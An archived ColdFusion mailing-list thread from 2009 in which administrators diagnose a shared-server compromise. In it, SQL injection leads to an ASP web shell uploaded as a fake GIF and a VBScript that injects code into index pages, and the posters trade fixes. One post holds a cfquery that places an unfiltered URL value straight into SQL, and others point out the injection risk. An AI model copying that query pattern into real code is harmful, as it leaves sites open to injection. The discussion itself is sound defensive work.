Home of the ColdFusion Community
|
Mailing Lists
|
Home /
Groups /
ColdFusion Talk (CF-Talk)
Question about hack
Author: ALL
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#322081
well in our case, we already fixed the problem that allowed the person to
upload in the first place.
i posted it in one of the first posts in this thread.
The problem we where having was finding the script that was still getting
ran, which we finally found.
On Thu, Apr 30, 2009 at 10:53 AM, Dave Watts <dwatts@figleaf.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#322080
----- Excess quoted text cut - see Original Post for more -----
Well, actually, that's not the final cause of the problem, just to be
clear. The cause was whatever allowed someone to upload the file in
the first place.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#322079
Nate,
Thanks for the post follow up. Very helpful.
-Mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
We finally fixed our issue.
After a long crackdown on security on our server, one of our sites (the one
that was causing all the fuss) gave me it's name and after about 2 mins it
was quite clear what was causing it.
mw.asp - (contents can be found here: http://pastebin.com/f5d798bd1 )
and we already moved the sites that had important info to another *secure*
server, so until we get the dns info to all the sites so we can migrate them
over to another server, we are going to have to stick with this one for a
few weeks.
Just figured i'd share the final cause of the problem.
-Nathan
Author: ALL
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#322077
We finally fixed our issue.
After a long crackdown on security on our server, one of our sites (the one
that was causing all the fuss) gave me it's name and after about 2 mins it
was quite clear what was causing it.
mw.asp - (contents can be found here: http://pastebin.com/f5d798bd1 )
and we already moved the sites that had important info to another *secure*
server, so until we get the dns info to all the sites so we can migrate them
over to another server, we are going to have to stick with this one for a
few weeks.
Just figured i'd share the final cause of the problem.
-Nathan
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321901
> The issue with formatting is that it will likely come back when we move our
> sites back onto the server....
> From what I am gathering it is actually being ran manually, not on
> a scheduled task and likely remotely.
>
> I "Believe" this is coming from ASP and not coldfusion itself, due to
> articles like this
Well, it's your job to secure the new server so that this doesn't
happen. But the server is compromised right now to a degree that I
wouldn't want to guarantee you can fix the problem.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: ALL
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321898
The issue with formatting is that it will likely come back when we move our
sites back onto the server....
From what I am gathering it is actually being ran manually, not on
a scheduled task and likely remotely.
I "Believe" this is coming from ASP and not coldfusion itself, due to
articles like this:
http://translate.google.com/translate?hl=en&sl=zh-CN&u=http://q.163.com/lianglimi/blog/hhl101@126/669001092009320624566/&ei=B7bwSfuPDcWFtgfP7YW-Dw&sa=X&oi=translate&resnum=1&ct=result&prev=/search%3Fq%3Dcscript%2Bscan.vbe%26hl%3Den%26rlz%3D1C1GGLS_enUS324US324%26sa%3DG
(originally in Chinese or something and used google to translate it).
On Thu, Apr 23, 2009 at 10:02 AM, Mark Kruger
<mkruger@cfwebtools.com>wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321873
Nate,
Excellent ...thanks for this.
-mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
Not sure if any more info on this subject has came up, but here is the
contents of the file gm.vbs that was doing all the dirty work:
http://paste-it.net/public/v22f672/
I have also noticed a new file named:
1.exe in the c:\ root directory. It has an icon of "BMW" (the car company),
not sure if that has something to do with it either.
-Nathan
On Thu, Apr 16, 2009 at 7:56 PM, Al Musella, DPM
<musella@virtualtrials.com>wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321850
> I strongly recommend that you reformat the disk and reinstall. The
Much nodding here too !
If you can afford too, and it contains any sort of sensitive data, you really
need to take this opportunity to buy all new hardware - anything could be
running (in the BIOS, in the hypervisor, ...)
--
Helping to biannually extend infrastructures as part of the IT team of the
year, '09 and '08
Tom Chiverton
Developer
Tel: +44 0161 618 5032
Fax: +44 0161 618 5099
Tom.Chiverton@halliwells.com
3 Hardman Square, Manchester, M3 3EB
www.Halliwells.com
****************************************************
This email is sent for and on behalf of Halliwells LLP.
Halliwells LLP is a limited liability partnership registered in England and Wales
under registered number OC307980 whose registered office address is at Halliwells
LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is
available for inspection at the registered office together with a list of those
non members who are referred to as partners. We use the word partner to refer
to a member of the LLP, or an employee or consultant with equivalent standing and
qualifications. Regulated by the Solicitors Regulation Authority.
CONFIDENTIALITY
This email is intended only for the use of the addressee named above and may be
confidential or legally privileged. If you are not the addressee you must not
read it and must not use any information contained in nor copy it nor inform any
person other than Halliwells LLP or the addressee of its existence or contents.
If you have received this email in error please delete it and notify Halliwells
LLP IT Department on 0870 365 2500.
For more information about Halliwells LLP visit www.Halliwells.com.
Author: James Holmes
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321849
Some further instructions in this instuctional vid:
http://www.youtube.com/watch?v=k-GaRKDsz-Y
mxAjax / CFAjax docs and other useful articles:
http://www.bifrost.com.au/blog/
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321848
----- Excess quoted text cut - see Original Post for more -----
I strongly recommend that you reformat the disk and reinstall. The
machine has been compromised, and you really can't make it trustable
again. If it's just a CF server, copy the CF files, export your CF
settings, and after you reinstall Windows and CF you should be able to
restore functionality pretty quickly.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: ALL
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321844
Not sure if any more info on this subject has came up, but here is the
contents of the file gm.vbs that was doing all the dirty work:
http://paste-it.net/public/v22f672/
I have also noticed a new file named:
1.exe in the c:\ root directory. It has an icon of "BMW" (the car company),
not sure if that has something to do with it either.
-Nathan
On Thu, Apr 16, 2009 at 7:56 PM, Al Musella, DPM
<musella@virtualtrials.com>wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Al Musella, DPM
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321715
A few ideas:
1. Set the ftp security to only allow
connections from specific IP addresses. If the
user has a dynamic ip, then use his entire
range.. better than letting the entire world in
2. Your blog shows why I said to Michael to
reformat the drive and reinstall everything when
he was attacked. Once you let someone else get
access to your server, there is no way you can
ever trust it again. It has to be reformatted.
3. I know it isn't the right way to fight an
attack, but for this specific attack, just
put your index.cfm file into a different file,
then have your index.cfm file just do a
cflocation to that page. If the hack adds stuff
to the index.cfm page, nothing will happen to the users.
At 03:31 PM 4/16/2009, you wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321708
Aweome Nate... I'm going to add this as an adendum to my post...
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
Hey Thanks Mark, I learnt a bit more about it from reading your article and
found more info on it last night when (as you stated) 9:00 rolled around...
I have been running a process monitor program that tracks file changes to
see what process/program is actually changing the files, and it was coming
from cscript.exe which is the executer to execute *.vbs scripts and other
"visual" languages. The executing script was "c:/gm.vbs" but the script did
not exist when I went looking for it....
So, my thoughts on it are this is just the part doing the dirty work, and
there is an actual executable or service somewhere that is making the file
and executing it.
Here is the info my process monitor spit out about the cscript.exe file that
was doing the dirty work:
Path: "C:\WINDOWS\system32\cscript.exe"
Command Line: "cscript c:\gm.vbs d:\inetpub"
User: "NT AUTHORITY\SYSTEM"
Started: "4/15/2009 8:57:58 PM"
Ended: "4/15/2009 9:01:11 PM"
Architecture: 32-bit
I hope this may help anyone else working on this issue, I believe I am
extremely close to solving it and just need it to run once more, because
this time I have the process monitor tracking almost everything.
-Nathan Bruer
On Thu, Apr 16, 2009 at 1:31 PM, Mark Kruger <mkruger@cfwebtools.com>
wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: ALL
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321703
Hey Thanks Mark, I learnt a bit more about it from reading your article and
found more info on it last night when (as you stated) 9:00 rolled around...
I have been running a process monitor program that tracks file changes to
see what process/program is actually changing the files, and it was coming
from cscript.exe which is the executer to execute *.vbs scripts and other
"visual" languages. The executing script was "c:/gm.vbs" but the script did
not exist when I went looking for it....
So, my thoughts on it are this is just the part doing the dirty work, and
there is an actual executable or service somewhere that is making the file
and executing it.
Here is the info my process monitor spit out about the cscript.exe file that
was doing the dirty work:
Path: "C:\WINDOWS\system32\cscript.exe"
Command Line: "cscript c:\gm.vbs d:\inetpub"
User: "NT AUTHORITY\SYSTEM"
Started: "4/15/2009 8:57:58 PM"
Ended: "4/15/2009 9:01:11 PM"
Architecture: 32-bit
I hope this may help anyone else working on this issue, I believe I am
extremely close to solving it and just need it to run once more, because
this time I have the process monitor tracking almost everything.
-Nathan Bruer
On Thu, Apr 16, 2009 at 1:31 PM, Mark Kruger <mkruger@cfwebtools.com>
wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321695
For those interested I have compiled all I know about this attack into a
blog post:
http://www.coldfusionmuse.com/index.cfm/2009/4/16/iframe.insertion.hack
Again, we have not specifically identified the attack but we have lots of
information and a stop gap measure :)
-Mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
Thanks... I'll add that to my list.
I have a pretty hefty blog post coming out on this tomorrow (or hopefully
tomorrow :).
-mark
Author: Richard White
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321602
thanks for the info, at least we know what to look for now. we will also try to
setup something similar, thanks again
----- Excess quoted text cut - see Original Post for more -----
Author: Al Musella, DPM
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321601
No - if you are hacked, the home page is available, but it includes a
javascript that does bad things to the visitors.
The most common way is a sql injection attack, where they insert the
javascript into some fields in the database, (in my case, they
appended the javascript to all vchar fields in every table) so when
you display information on the website from the database, you
inadvertently are also adding that javascript to the page.
The recent attack that is being talked about has the attacker
editing the index.cfm page and directly adding javascript to it.
In both types of attacks, the home page is available and you might
not notice anything just by looking at it.
So my idea to detect it is to set up a cfhttp call to the index.cfm page.
I add a url parameter that signifies that the page should also
display my own personal information from one of the tables. I do this
because I know I won't change the information in the table, and if it
does change, there was a problem.
So the first time I do the cfhttp call, I save the page, then all
subsequent calls get compared to it. If it changes, or is not
available, I send an alert to my cell phone.
I do this as an automated task from a different server so I can test
if the website is up also.
One problem I had was my banner ad changes.. so I put a comment
around the banner ad that says "start banner" "end banner", and snip
that section out before comparing it.
At 12:34 PM 4/14/2009, you wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321598
Thanks... I'll add that to my list.
I have a pretty hefty blog post coming out on this tomorrow (or hopefully
tomorrow :).
-mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
Mark,
I can confirm that there has been FTP related 'sploits going around.
I received a message from a hosting company warning that:
"There is a potential security exploit within the FTP software that we use
on your account."
Just a 411
G!
----- Excess quoted text cut - see Original Post for more -----
point.
>
> Anyway, I agree that cfexecute is a dangerous tag that needs to be
> controlled, but it does not appear to be the cuprit. All of this
> advice is good, but the only place that CF comes into play on this
> particular hack happens to be the propensity to use "index.cfm" as the
home page script.
----- Excess quoted text cut - see Original Post for more -----
Author: Gerald Guido
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321595
Mark,
I can confirm that there has been FTP related 'sploits going around.
I received a message from a hosting company warning that:
"There is a potential security exploit within the FTP software that we use
on your account."
Just a 411
G!
----- Excess quoted text cut - see Original Post for more -----
Author: Richard White
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321580
thanks for the info
----- Excess quoted text cut - see Original Post for more -----
information!
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321578
> this sounds like a good idea. when a hack is taking place would the home
page not be
> available? is this because they are running multiple scripts which takes all
the resources?
Many automated attacks deface your existing pages, or append
additional content to those pages. Not all do, of course.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more
information!
Author: Richard White
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321577
this sounds like a good idea. when a hack is taking place would the home page not
be available? is this because they are running multiple scripts which takes all
the resources?
can you explain this a little more as i feel like it is a good idea, and would
like to understand how to implement it
thanks
----- Excess quoted text cut - see Original Post for more -----
Author: Donnie Bachan (Gmail)
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321565
Hi Mark,
I only mentioned cfexecute because of the permissions set on our
specific case. Your info seems most likely. I did notice that there
was a cfm file created with a call to cfexecute on the webroot so this
should be a check as well.
best regards
Donnie
----- Excess quoted text cut - see Original Post for more -----
Author: Nick Gleason
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321557
Donnie, Mark,
Our research so far seems to support marks's analysis of this problem.
There are still some unknowns here so that may change. But, changing your
FTP accounts and setting your FTP server to ban IPs after a certain number
of failed login attempts will prevent most brute force attempts on FTP. Our
server admin didn't do that which appears to have been a mistake.
Nick
............................................................................
.....
----- Excess quoted text cut - see Original Post for more -----
Author: Al Musella, DPM
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321555
To test if I have been hacked: I run an automated task from my
home computer that requests my home page every 15 minutes. I use a
URL variable that tells my home page to display a footer (which only
appears when this particular url variable is present) which shows my
name, address, phone, email address and a few other fields taken from
my "members" table. I then compare what is displayed to what I know
belongs there. (The only part that changes is the banner ad, which I
ignore) IF the page isn't available, or if any of the text
changes, I send an alert to my cell phone. When I was hacked last
year, every table in my database had a javascrpt inserted into it.
This will alert me if that happen again. I do this for my 3 most
important web sites.
----- Excess quoted text cut - see Original Post for more -----
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321554
Donnie,
I believe this is the same attack I have been helping another customer with
and it does not appear to be related to CF. Instead, it appears to start
with a malware install of some kind on the server (and possibly a root kit)
and then progress to the creation of accounts and the changing of file
permissions. Another theory gaining weight (and illustrating that we don't
know much yet) is that this attack is an agent on a client computer that
piggybacks onto FTP - which explains a few things but not everything. I'm
guessing some combination at this point.
Anyway, I agree that cfexecute is a dangerous tag that needs to be
controlled, but it does not appear to be the cuprit. All of this advice is
good, but the only place that CF comes into play on this particular hack
happens to be the propensity to use "index.cfm" as the home page script. The
attack targets "index.*" files and affects (on the server I am working with)
Index.cfm, index.html and index.php etc.
-Mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
Hi Nick,
I know this post is a bit late but to your original question, that attack is
as a result of incorrect file/iis permissions and is not an XSS attack. I
would even bet that you are on a shared server (at HMS) since one of my
client sites had this exact same problem. The attacker would have gained
access to the file system (possibly via FTP) and executed code that injected
the code into all index.* files on the server (not just your hosting
account). We have had a lot of problems trying to get this sorted out. It
appears that the issue was with security related to the windows script host
and/or CFEXECUTE. The only thing you can do to prevent this is work with
your hosting provider to secure the system or move to a VPS or dedicated
account and make sure your FTP accounts are secure.
HTH
Donnie Bachan
"Nitendo Vinces - By Striving You Shall Conquer"
======================================================================
The information transmitted is intended only for the person or entity to
which it is addressed and may contain confidential and/or privileged
material. Any review, retransmission, dissemination or other use of, or
taking of any action in reliance upon, this information by persons or
entities other than the intended recipient is prohibited. If you received
this in error, please contact the sender and delete the material from any
computer.
----- Excess quoted text cut - see Original Post for more -----
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321552
Checking log files, reviewing websites, automated emails with error
messages. Those are just a few examples.
> We have been attacked by the exact same hack. We discovered it on
> April 6 and it has proven impossible to clean/remove.
hi, i am relatively new to CF and building web applications. i have built a
few web apps and tried to use as much security as i can. my questions is how
do you guys discover that you have been hacked? would a hosting company let
you know? does the customer let you know of changes in behaviour? do you
have a piece of software looking for anything suspicious in the logs, etc...
thanks
Author: Donnie Bachan (Gmail)
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321551
Hi Nick,
I know this post is a bit late but to your original question, that
attack is as a result of incorrect file/iis permissions and is not an
XSS attack. I would even bet that you are on a shared server (at HMS)
since one of my client sites had this exact same problem. The attacker
would have gained access to the file system (possibly via FTP) and
executed code that injected the code into all index.* files on the
server (not just your hosting account). We have had a lot of problems
trying to get this sorted out. It appears that the issue was with
security related to the windows script host and/or CFEXECUTE. The only
thing you can do to prevent this is work with your hosting provider to
secure the system or move to a VPS or dedicated account and make sure
your FTP accounts are secure.
HTH
Donnie Bachan
"Nitendo Vinces - By Striving You Shall Conquer"
======================================================================
The information transmitted is intended only for the person or entity to
which it is addressed and may contain confidential and/or privileged
material. Any review, retransmission, dissemination or other use of, or
taking of any action in reliance upon, this information by persons or
entities other than the intended recipient is prohibited. If you received
this in error, please contact the sender and delete the material from any
computer.
----- Excess quoted text cut - see Original Post for more -----
Author: Richard White
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321550
hi dave, i have scripts that write to the file system as well. what would i need
to do to secure them, do you have a link that i could read in relation to this as
i am a little lost as to what to do
thanks
----- Excess quoted text cut - see Original Post for more -----
information!
Author: Richard White
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321549
> We have been attacked by the exact same hack. We discovered it on
> April 6 and it has proven impossible to clean/remove.
hi, i am relatively new to CF and building web applications. i have built a few
web apps and tried to use as much security as i can. my questions is how do you
guys discover that you have been hacked? would a hosting company let you know?
does the customer let you know of changes in behaviour? do you have a piece of
software looking for anything suspicious in the logs, etc...
thanks
Author: ALL
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321520
Jason, look for a file named logs.asp or log.asp or one named top.aspx if
you see either of those files on your computer look at them and possably
delete them. Those where the files that where where the infection was being
told what to do.
also, will you tell me what Content Management System any of you guys that
have the infection use? because I am starting to think the only thing that
is relating this to ColdFusion is that CMS that is very unsecure and very
old.
Also, seens how the info we are experiancing is the same i figured i'd post
the IP address of what infected us in the first place:
61.236.71.195
check your log files see if that ip address turns up and see what happened
for yourself, the ip address turns out to be something in china i believe.
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321519
> We are having to scrub our files to remove the injected code (which is being
written directly
> to the files as the result of the hack allowing "FULL CONTROL" for the
Everyone user on the
> machine.
>
> Have you determined a solution for removing/preventing this?
First, audit your code to find any scripts that can write to the filesystem.
Second, audit your code to find any scripts that pass unfiltered user
input to the database.
Third, fix that code.
Fourth, configure filesystem permissions properly to prevent CF or
your database from writing to the web server's webroot.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more
information!
Author: Jason Bach
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321518
Nick:
We have been attacked by the exact same hack. We discovered it on April 6 and
it has proven impossible to clean/remove.
I have read through this thread, but I don't see where you found anything
specifically causing the problem.
We are also using IIS6 and CF7 and have approx 300 sites on this shared
webserver.
We are having to scrub our files to remove the injected code (which is being
written directly to the files as the result of the hack allowing "FULL CONTROL"
for the Everyone user on the machine.
Have you determined a solution for removing/preventing this?
Let me know.
JB
----- Excess quoted text cut - see Original Post for more -----
Author: Matthew
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321516
OK thanks for the pointers all, I better roll my sleeves up and start editing
before I get done...
On 10 Apr 2009, at 18:21, "Brad Wood" <brad@bradwood.com> wrote:
Using MS SQL the code below would be safe as long as all your parameters are
strings and encased in single quotes since the cfquery tag will
automatically escape any single quotes that exist in the #url.uid" variable.
If you were to pass in a numeric value to the stored procedure which did not
have single ticks around it, you would be vulnerable again even though it is
a stored proc call.
If it's all the same to you, I would recommend using the cfstoreproc tag to
call your procedure. It allows for the cfprocparam tag for your parameters
which can optionally validate your inputs' data type as well. (just like
cfqueryparam does)
~Brad
OK point taken, not safe with MySQL but fine with MSSQL? I just need to
know if I should start working on my old MS SQL codes, so far none have
suffered with injection attacks it might be by sheer luck or maybe all is
well with it as it is on a MS SQL server, right?
Not necessarily. With the proper configuration of MySQL (multiple
statements
allowed, and \ escaping single quotes) your example below could be
hacked.
Brad
Author: Matthew Allen
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321515
I've always had the impression that if you use stored procedure and so far it's
not dynamically built string you're fine, so like my example in previous post,
you put your query in MS SQL and use EXEC to call the query on your CF pages, I
sometimes Declare the parameter but most times it's like the way I've described
before. Should I stop everything I'm doing now and start editing my codes?!!
Luckily I'm less than 2 years in CF, I only have about 6 applications to worry
about..;
Stored Proc:
@uid uniqueidentifier
AS
BEGIN
SELECT ID,column1, column2..etc
FROM tbltable
WHERE UID = @uid END
CF Page:
<cfquery name="doStuff" datasource="#application.DSN#">
DECLARE @Param1 varchar;
EXEC usp_getSomeData
@param = '#url.uid#'
</cfquery>
----- Excess quoted text cut - see Original Post for more -----
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321514
Using MS SQL the code below would be safe as long as all your parameters are
strings and encased in single quotes since the cfquery tag will
automatically escape any single quotes that exist in the #url.uid" variable.
If you were to pass in a numeric value to the stored procedure which did not
have single ticks around it, you would be vulnerable again even though it is
a stored proc call.
If it's all the same to you, I would recommend using the cfstoreproc tag to
call your procedure. It allows for the cfprocparam tag for your parameters
which can optionally validate your inputs' data type as well. (just like
cfqueryparam does)
~Brad
----- Excess quoted text cut - see Original Post for more -----
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321513
Matt,
Why are you not using cfwqueryparam in the cf code below? Do you have a good
reason not to do so?
-mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
OK point taken, not safe with MySQL but fine with MSSQL? I just need to know
if I should start working on my old MS SQL codes, so far none have suffered
with injection attacks it might be by sheer luck or maybe all is well with
it as it is on a MS SQL server, right?
----- Excess quoted text cut - see Original Post for more -----
Author: Matthew Allen
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321512
OK point taken, not safe with MySQL but fine with MSSQL? I just need to know if I
should start working on my old MS SQL codes, so far none have suffered with
injection attacks it might be by sheer luck or maybe all is well with it as it is
on a MS SQL server, right?
----- Excess quoted text cut - see Original Post for more -----
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321509
Not necessarily. With the proper configuration of MySQL (multiple statements
allowed, and \ escaping single quotes) your example below could be hacked.
http://www.codersrevolution.com/index.cfm/2008/7/13/Just-when-you-felt-safe-SQL-Injection-and-MySQL
The underlying reason is because you are not explicitly telling your SQL
server what is SQL code and what is the parameter. The one and only
sure-fire way to do that is with the likes of cfqueryparam, cfprocparam, or
sp_executesql (MS SQL Server).
~Brad
----- Excess quoted text cut - see Original Post for more -----
Author: Chad Gray
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321508
One thing I will add is if you are using CFFile to do the upload use it's
"accept" attribute to only except the mime types you want to upload. If it
errors capture it and output a nice error message.
It is not full proof, but another layer in making file upload more safe.
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321506
Technically, no.
In this post I have an example of a procedure which would be venerable to
all kinds of SQL injection attacks.
http://www.codersrevolution.com/index.cfm/2008/7/22/When-will-cfqueryparam-NOT-protect-me
SQL injection is made possible when you don't differentiate between your SQL
code and arbitrary parameters. ANY form of dynamic SQL can be susceptible
to that.
~Brad
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321505
> Is it safe to assume then that using stored procedure would have prevented
the attack?
Yes, unless the stored procedure is using something like EXECUTE,
EXEC, etc to build executable strings of SQL.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more
information!
Author: Matthew Allen
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321504
To be more precise, would the code below prevent an injection attack?
Store proc:
.......
@uid uniqueidentifier
AS
BEGIN
SELECT ID,column1, column2..etc
FROM tbltable
WHERE UID = @uid
END
CF Code:
<cfquery name="doStuff" datasource="application.DSN">
EXEC usp_getSomeData
@param = '#url.uid#'
</cfquery>
----- Excess quoted text cut - see Original Post for more -----
Author: Matthew Allen
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321501
>This is yet another example where CFQUERYPARAM would have prevented
>the attack. Every time someone says it's unnecessary, I'm going to
>point them to this thread.
Is it safe to assume then that using stored procedure would have prevented the
attack?
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321499
> What happened to us was not actually caused by ColdFusion. We found that it
> was a ColdFusion script we where running that was not secure.
Of course. CF is just like any other app server - it will do exactly
what you tell it to do. If you have CF programs that can write to the
filesystem, they need to be secured to prevent them from writing to
the filesystem in ways you don't want.
> The attacker used a method called sql injection attack, which means he/she
queried
> the server hundreds if not thousands of times data mining the database until
> they got the site's admin/password.
You can easily prevent this by using CFQUERYPARAM in all database
queries for any data that comes from the client.
----- Excess quoted text cut - see Original Post for more -----
In general, you should be very careful when allowing file uploads. You
might rename files, you might place those files in a directory that
blocks execution, you might place those files in a non-web-accessible
directory.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more
information!
Author: James Holmes
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321497
2009/4/10 ALL <thegreatall@gmail.com>:
>
> I cannot stress enough how important it is to escape sql strings before
sending them
> to a SQL server of any kind,
This is yet another example where CFQUERYPARAM would have prevented
the attack. Every time someone says it's unnecessary, I'm going to
point them to this
thread.
Author: ALL
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321496
After allot of looking into and investigating last night, we have found some
more info on the subject.
What happened to us was not actually caused by ColdFusion. We found that it
was a ColdFusion script we where running that was not secure. The attacker
used a method called sql injection attack, which means he/she queried the
server hundreds if not thousands of times data mining the database until
they got the site's admin/password.
So, there was 1 security issue with the coldfusion script we where using.
After he got the Admin/password they logged into the site's administration
and uploaded a "gif" but it was not actually a "gif" rather it was an asp
page that got executed on the server, because whoever wrote our CMS
obviously didn't know how to code securely. (file name was logs.asp or
log.aspx or a combo of the two)
After he had a asp page on the server, he used that script to upload another
asp page named "tops.aspx" which when I reviewed the code and did some
research into found that the code was actually a well known trojan that
was specifically designed to give "attackers" access to infect servers.
Hope this comes of use to some other people having this issue; I cannot
stress enough how important it is to escape sql strings before sending them
to a SQL server of any kind, and how important it is to rename files that
people upload when writing a script. (The most secure way is generally to do
two things, first you can verify images by using code to make sure the file
is actually an image [i'm sure you can find some free code to do so], and to
rename the image so it does not put an extension on the file, or make sure
the file ends in .jpg, .gif, exc... and make sure if you do not allow script
execution in the file you upload too.)
Hope this helps,
-Nathan
----- Excess quoted text cut - see Original Post for more -----
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321495
Nathan,
Can you answer a question for me. Does this attack affect "all cfm" pages or
does it affect "index.*" pages?
-Mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
